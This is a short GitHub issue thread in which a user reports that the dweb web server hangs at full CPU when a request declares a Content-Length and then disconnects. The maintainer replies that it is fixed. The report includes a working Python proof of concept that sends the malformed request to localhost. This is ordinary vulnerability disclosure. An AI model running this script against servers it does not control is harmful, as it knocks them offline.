### ISSUE TITLE
Content-Length is not checked

### ISSUE THREAD

**Issue by Cotix** [davidsblog/dweb#2]
Giving a content-length bigger than 0, and than disconnecting DoSes the server. Server gets stuck in while(true) loop, and uses 100% cpu.

try:
# !/usr/bin/python

import sys, socket
host =  "localhost"

buffer = b"GET / HTTP/1.0\r\nContent-Length: 1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #for Tcpc
s.connect((host,80))
s.send(buffer)
s.close()

Got to a 200 cpu load after 10 seconds of executing this script.

**Comment by davidsblog** [comment]
Thanks for letting me know, I will fix that.

**Comment by davidsblog** [comment]
I think that this is fixed now.
